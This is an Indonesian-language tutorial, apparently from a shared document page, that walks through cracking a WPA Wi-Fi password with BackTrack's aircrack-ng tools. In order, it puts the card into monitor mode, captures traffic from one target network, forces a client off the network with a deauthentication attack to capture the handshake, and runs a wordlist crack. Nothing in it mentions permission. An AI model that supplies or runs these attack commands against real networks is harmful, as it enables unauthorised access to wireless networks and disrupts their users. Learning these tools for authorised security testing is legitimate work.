You are on page 1of 1

1. Siapkan CD Live Backtrack n tentunya dengan partnernya n of course sebatang r okok agar lebih santai.. 2.

masuk ke dekstop dengan perintah ~# startx 3. buka konsole dan ketikkan perintah :~# ifconfig -a http://neo013.files.wordpress.com/2009/10/1.jpg 4. :~# ifconfig wlan0 up (tuk mengaktifkan interface wlan0) http://neo013.wordpress.com/files/2009/10/2.jpg 5. :~# airmon-ng :~# airmon-ng start wlan0 (tuk membuat virtual interface mode monitor) http://neo013.wordpress.com/files/2009/10/3.jpg 6. :~# airodump-ng mon0 (tuk memonitoring jaringan yang ada di sekitar) mon0 adalah interface virtual hasil dari airmon-ng tadi http://neo013.wordpress.com/files/2009/10/4.jpg hasil dari airodump-ng mon0 http://neo013.wordpress.com/files/2009/10/5.jpg 7. :~# airodump-ng -w test --channel 11 --bssid 00904c910001 mon0 (tuk memonitor ing khusus jaringan yang memiliki bssid 00:90:4C:91:00:01 pada channel 11 dan ha sil dari monitoring di tulis pada file yang bernama 'test') http://neo013.wordpress.com/files/2009/10/6.jpg 8. :~# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0 (aireplay-ng diguna kan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapat kan paket handshake yang dibutuhkan untuk proses cracking) -0 : mode serangan deAuthentication 1 : dilakukan sebanyak 1x deAuth http://neo013.wordpress.com/files/2009/10/7.jpg 9. setelah mendapatkan paket handshake, selanjutnya adalah proses cracking denga n menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah :~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentes t/passwords/wordlists/inawpa.txt http://neo013.wordpress.com/files/2009/10/8.jpg

You might also like